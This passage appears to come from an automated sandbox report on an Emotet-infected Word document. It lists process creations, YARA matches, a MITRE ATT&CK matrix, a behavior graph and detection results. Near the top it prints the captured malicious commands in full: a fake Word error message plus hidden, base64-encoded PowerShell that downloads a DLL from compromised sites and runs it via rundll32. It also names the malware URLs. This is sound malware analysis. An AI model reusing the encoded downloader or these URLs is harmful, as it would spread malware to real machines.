                    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Umbfypagzceb\sgdrbhhkrdu.ucy',Control_RunDLLJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Pegimmebijdsrjpt\trbcflzgrjlwmib.jho',Control_RunDLLJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Pqftsc\netes.ucb',Control_RunDLLJump to behavior
                    Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQA
                    Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAK
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAKJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10004C5A cpuid 7_2_10004C5A
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10007D46 GetSystemTimeAsFileTime,GetCurrentThreadId,GetTickCount64,QueryPerformanceCounter,7_2_10007D46
                    Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information:

                    barindex
                    Yara detected EmotetShow sources
                    Source: Yara matchFile source: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.2111056339.0000000000230000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.2115843341.0000000000470000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.2123134959.0000000000270000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.2352653506.0000000000211000.00000020.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.2115897834.00000000004B1000.00000020.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.2114491757.00000000001D1000.00000020.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.2109532201.0000000000200000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.2113145679.00000000006A0000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.2111128932.00000000002A1000.00000020.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.2120152287.0000000000240000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.2120200224.0000000000261000.00000020.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000002.2117263919.00000000007D1000.00000020.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000002.2116824052.00000000002B0000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.2114433259.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.2113198407.00000000006C1000.00000020.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.2352632908.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.2123517027.00000000006B1000.00000020.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 13.2.rundll32.exe.240000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.rundll32.exe.470000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.rundll32.exe.2b0000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.rundll32.exe.270000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.rundll32.exe.2b0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.rundll32.exe.220000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.rundll32.exe.270000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.rundll32.exe.6c0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.rundll32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.rundll32.exe.1b0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.rundll32.exe.1b0000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.rundll32.exe.1d0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.rundll32.exe.240000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.rundll32.exe.4b0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.rundll32.exe.6a0000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.rundll32.exe.260000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.rundll32.exe.1f0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.rundll32.exe.2a0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.rundll32.exe.6b0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.rundll32.exe.6a0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.rundll32.exe.470000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.rundll32.exe.230000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.rundll32.exe.230000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.rundll32.exe.7d0000.1.unpack, type: UNPACKEDPE

                    Mitre Att&ck Matrix

                    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                    Valid AccountsWindows Management Instrumentation11Path InterceptionProcess Injection111Disable or Modify Tools1OS Credential DumpingSystem Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer3Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                    Default AccountsScripting32Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDeobfuscate/Decode Files or Information3LSASS MemoryFile and Directory Discovery3Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothEncrypted Channel2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                    Domain AccountsNative API1Logon Script (Windows)Logon Script (Windows)Scripting32Security Account ManagerSystem Information Discovery26SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                    Local AccountsExploitation for Client Execution3Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information1NTDSSecurity Software Discovery31Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
                    Cloud AccountsCommand and Scripting Interpreter211Network Logon ScriptNetwork Logon ScriptMasquerading11LSA SecretsVirtualization/Sandbox Evasion2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                    Replication Through Removable MediaPowerShell3Rc.commonRc.commonVirtualization/Sandbox Evasion2Cached Domain CredentialsProcess Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                    External Remote ServicesScheduled TaskStartup ItemsStartup ItemsProcess Injection111DCSyncRemote System Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                    Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobHidden Files and Directories1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                    Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Rundll321/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 signatures2 2 Behavior Graph ID: 336494 Sample: DATA-480841.doc Startdate: 06/01/2021 Architecture: WINDOWS Score: 100 55 Antivirus detection for URL or domain 2->55 57 Multi AV Scanner detection for submitted file 2->57 59 Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) 2->59 61 12 other signatures 2->61 14 cmd.exe 2->14         started        17 WINWORD.EXE 293 25 2->17         started        process3 signatures4 75 Suspicious powershell command line found 14->75 77 Very long command line found 14->77 79 Encrypted powershell cmdline option found 14->79 81 PowerShell case anomaly found 14->81 19 powershell.exe 12 9 14->19         started        22 msg.exe 14->22         started        process5 dnsIp6 47 khanhhoahomnay.net 210.86.239.69, 49168, 80 NETNAM-AS-APNetnamCompanyVN Viet Nam 19->47 49 veterinariadrpopui.com 209.59.139.39, 49167, 80 LIQUIDWEBUS United States 19->49 51 3 other IPs or domains 19->51 24 rundll32.exe 19->24         started        process7 process8 26 rundll32.exe 15 24->26         started        signatures9 69 Hides that the sample has been downloaded from the Internet (zone.identifier) 26->69 29 rundll32.exe 5 26->29         started        process10 signatures11 73 Hides that the sample has been downloaded from the Internet (zone.identifier) 29->73 32 rundll32.exe 5 29->32         started        process12 signatures13 53 Hides that the sample has been downloaded from the Internet (zone.identifier) 32->53 35 rundll32.exe 5 32->35         started        process14 signatures15 63 Hides that the sample has been downloaded from the Internet (zone.identifier) 35->63 38 rundll32.exe 5 35->38         started        process16 signatures17 65 Hides that the sample has been downloaded from the Internet (zone.identifier) 38->65 41 rundll32.exe 5 38->41         started        process18 signatures19 67 Hides that the sample has been downloaded from the Internet (zone.identifier) 41->67 44 rundll32.exe 5 41->44         started        process20 signatures21 71 Hides that the sample has been downloaded from the Internet (zone.identifier) 44->71

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    DATA-480841.doc60%VirustotalBrowse

                    Dropped Files

                    No Antivirus matches

                    Unpacked PE Files

                    SourceDetectionScannerLabelLinkDownload
                    7.2.rundll32.exe.220000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                    9.2.rundll32.exe.6c0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                    10.2.rundll32.exe.1d0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                    11.2.rundll32.exe.4b0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                    13.2.rundll32.exe.260000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                    8.2.rundll32.exe.2a0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                    15.2.rundll32.exe.210000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                    14.2.rundll32.exe.6b0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                    12.2.rundll32.exe.7d0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File

                    Domains

                    SourceDetectionScannerLabelLink
                    veterinariadrpopui.com4%VirustotalBrowse
                    wpsapk.com1%VirustotalBrowse
                    sofsuite.com4%VirustotalBrowse

                    URLs

                    SourceDetectionScannerLabelLink
                    http://veterinariadrpopui.com0%Avira URL Cloudsafe
                    http://veterinariadrpopui.com/content/5f18Q/100%Avira URL Cloudmalware
                    http://sofsuite.com/wp-includes/2jm3nIk/0%Avira URL Cloudsafe
